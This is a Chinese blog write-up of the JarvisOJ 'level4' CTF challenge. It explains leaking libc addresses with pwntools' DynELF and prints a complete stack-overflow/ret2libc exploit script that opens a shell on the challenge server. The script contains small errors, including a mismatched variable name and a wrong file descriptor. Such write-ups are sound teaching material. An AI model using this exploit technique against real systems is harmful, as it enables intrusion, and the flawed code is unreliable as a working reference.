JarvisOJ level4

6 篇文章 0 订阅
5 篇文章 0 订阅

这题与level3相比就是就是题目并没有给出对应的libc文件,这里就要学习使用一波DynELF函数了,这是pwntools的一个函数,使用前请确认安装完整pwntools工具。

前言:

DynELF函数是通过已知函数,迅速查找libc库,并不需要我们自己本身知道对应版本的libc文件。
这是DynELF函数使用的一个模板:

def leak(address):
    payload=pad+p32(writeplt)+ret1+p32(1)+p32(address)+p32(4)
    io.sendline(payload)
    leak_sysaddr=io.recv(4)
    #print "%#x => %s" % (address, (leak_sysaddr or '').encode('hex'))   这里是测试用,可省略。
    return leak_sysaddr
d = DynELF(leak, elf=ELF("对应文件"))
sysaddr=d.lookup("system","libc")

pad为填充的垃圾数据,ret1为返回的地址(因为这里要重复利用漏洞,所以要选择有效合理的返回地址)。

详细使用方法请看安全客的技术分享:https://www.anquanke.com/post/id/85129
利用DynELF函数,我们可以泄露出system函数的地址,但是我们怎么找到/bin/sh呢?,当然文件本身是没有的,我们也没有办法泄露出来,怎么办呢?

这里我们就可以通过题目中含有的read函数,把/bin/sh读入进去,记住bss段的地址,再使用system函数调用就好了。
bss段
拿到题目,我们仍然是查看一下保护:
在这里插入图片描述
这是一个32位的程序,并且开了NX保护(开了堆栈不可执行,但是/bin/sh是参数,不是要执行的函数,函数system并不是我们填写到堆栈中的)。
接下来,我们开始找个个需要用到函数的地址:
我们要用到的函数有:
vulnerable_function()函数:
在这里插入图片描述
我们需要用他来做返回地址,才能够多次利用漏洞。
bss段地址(这个前面已经贴了图了)
write()函数的plt地址和read()函数的plt地址(这个虽然IDA可以直接查找到,但是我们可以用pwntools工具帮我们查找,更加省事 ,那怕是不一定)
找到所有的地址后我们就可以构造payload了,这里我构造了三个payload,当然,一些大佬使用 pop_pop_pop_ret 只构造两个payload也是非常适用的,我这里就不贴出大佬们的方法了。
下面是完整的exp:

#!/usr/bin/env python
from pwn import *
io=remote("pwn2.jarvisoj.com",9880)
elf=ELF("./level4")
vulner_function_address=0x804844B
write_plt=elf.plt["write"]
read_plt=elf.plt["read"]
bss_addr=0x0804a024
def leak(address):
    payload="a"*0x88+"aaaa"+p32(write_plt)+p32(vulner_function_address)+p32(1)+p32(address)+p32(4)
    io.sendline(payload)
    leak_sysaddr=io.recv(4)
    print "%#x => %s" % (address, (leak_sysaddr or '').encode('hex'))   #调试用可省略(最好是省略)
    return leak_sysaddr
d = DynELF(leak, elf=ELF("./level4"))
sys_addr=d.lookup("system","libc")
print hex(sysaddr)
payload1="a"*0x88+"aaaa"+p32(read_plt)+p32(vulner_function_address)+p32(1)+p32(bss_addr)+p32(8)
io.sendline(payload1)
io.sendline("/bin/sh")
payload2="a"*0x88+"aaaa"+p32(sys_addr)+p32(vulner_function_address)+p32(bss_addr)
io.sendline(payload2)
io.interactive()

运行结果:

在这里插入图片描述
由于这种题目flag不变,就码掉了,见谅!

引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,只是连接的地址不同。引用是一篇关于pwntools基本用法的文章,并提供了一些常用的函数和方法。根据这些引用内容,可以得出结论,jarvisoj_level0是一个存在栈溢出漏洞的程序,可以通过构造特定的payload来执行系统调用函数,从而获取shell权限。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [jarvisoj_level0](https://blog.csdn.net/weixin_56301399/article/details/125919313)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [jarvisOJ-level0](https://blog.csdn.net/qq_35661990/article/details/82889103)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [jarvis oj---level0解题方法](https://blog.csdn.net/weixin_45427676/article/details/97272924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值